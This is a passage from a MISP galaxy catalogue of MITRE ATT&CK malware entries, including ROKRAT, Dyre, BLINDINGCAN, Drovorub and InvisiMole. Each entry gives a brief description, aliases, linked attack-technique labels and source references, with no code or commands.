uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 4701. Table References
Links
https://attack.mitre.org/software/S0460
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

LOWBALL - S0042

[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-malware="LOWBALL - S0042"

LOWBALL - S0042 is also known as:

LOWBALL

View relationships graph

LOWBALL - S0042 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4702. Table References
Links
https://attack.mitre.org/software/S0042
https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

ROKRAT - S0240

[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123)

The tag is: misp-galaxy:mitre-malware="ROKRAT - S0240"

ROKRAT - S0240 is also known as:

ROKRAT

View relationships graph

ROKRAT - S0240 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4703. Table References
Links
https://attack.mitre.org/software/S0240
https://blog.talosintelligence.com/2017/04/introducing-rokrat.html
https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

Briba - S0204

[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)

The tag is: misp-galaxy:mitre-malware="Briba - S0204"

Briba - S0204 is also known as:

Briba

View relationships graph

Briba - S0204 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4704. Table References
Links
https://attack.mitre.org/software/S0204
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99

Dvmap - S0420

[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)

The tag is: misp-galaxy:mitre-malware="Dvmap - S0420"

Dvmap - S0420 is also known as:

Dvmap

View relationships graph

Dvmap - S0420 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 4705. Table References
Links
https://attack.mitre.org/software/S0420
https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/

Dyre - S0024

[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)

The tag is: misp-galaxy:mitre-malware="Dyre - S0024"

Dyre - S0024 is also known as:

Dyre
Dyzap
Dyreza

View relationships graph

Dyre - S0024 has relationships with:

similar: misp-galaxy:banker="Dyre" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 4706. Table References
Links
https://attack.mitre.org/software/S0024
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf
https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/
https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/

CALENDAR - S0025

[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="CALENDAR - S0025"

CALENDAR - S0025 is also known as:

CALENDAR

View relationships graph

CALENDAR - S0025 has relationships with:

similar: misp-galaxy:tool="CALENDAR" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4707. Table References
Links
https://attack.mitre.org/software/S0025
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

BLINDINGCAN - S0520

[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)

The tag is: misp-galaxy:mitre-malware="BLINDINGCAN - S0520"

BLINDINGCAN - S0520 is also known as:

BLINDINGCAN

View relationships graph

BLINDINGCAN - S0520 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"

Table 4708. Table References
Links
https://attack.mitre.org/software/S0520
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a
https://digital.nhs.uk/cyber-alerts/2020/cc-3603

OnionDuke - S0052

[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="OnionDuke - S0052"

OnionDuke - S0052 is also known as:

OnionDuke

View relationships graph

OnionDuke - S0052 has relationships with:

similar: misp-galaxy:malpedia="OnionDuke" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4709. Table References
Links
https://attack.mitre.org/software/S0052
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Drovorub - S0502

[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)

The tag is: misp-galaxy:mitre-malware="Drovorub - S0502"

Drovorub - S0502 is also known as:

Drovorub

View relationships graph

Drovorub - S0502 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 4710. Table References
Links
https://attack.mitre.org/software/S0502
https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

Naid - S0205

[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)

The tag is: misp-galaxy:mitre-malware="Naid - S0205"

Naid - S0205 is also known as:

Naid

View relationships graph

Naid - S0205 has relationships with:

similar: misp-galaxy:tool="Trojan.Naid" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4711. Table References
Links
https://attack.mitre.org/software/S0205
https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

GLOOXMAIL - S0026

[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="GLOOXMAIL - S0026"

GLOOXMAIL - S0026 is also known as:

GLOOXMAIL
Trojan.GTALK

View relationships graph

GLOOXMAIL - S0026 has relationships with:

similar: misp-galaxy:tool="GLOOXMAIL" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4712. Table References
Links
https://attack.mitre.org/software/S0026
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Circles - S0602

[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company’s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)

The tag is: misp-galaxy:mitre-malware="Circles - S0602"

Circles - S0602 is also known as:

Circles

View relationships graph

Circles - S0602 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450" with estimative-language:likelihood-probability="almost-certain"

Table 4713. Table References
Links
https://attack.mitre.org/software/S0602
https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/

DustySky - S0062

[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)

The tag is: misp-galaxy:mitre-malware="DustySky - S0062"

DustySky - S0062 is also known as:

DustySky
NeD Worm

View relationships graph

DustySky - S0062 has relationships with:

similar: misp-galaxy:tool="NeD Worm" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 4714. Table References
Links
https://attack.mitre.org/software/S0062
https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf
http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf
https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

InvisiMole - S0260

[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-malware="InvisiMole - S0260"

InvisiMole - S0260 is also known as:

InvisiMole

View relationships graph

InvisiMole - S0260 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
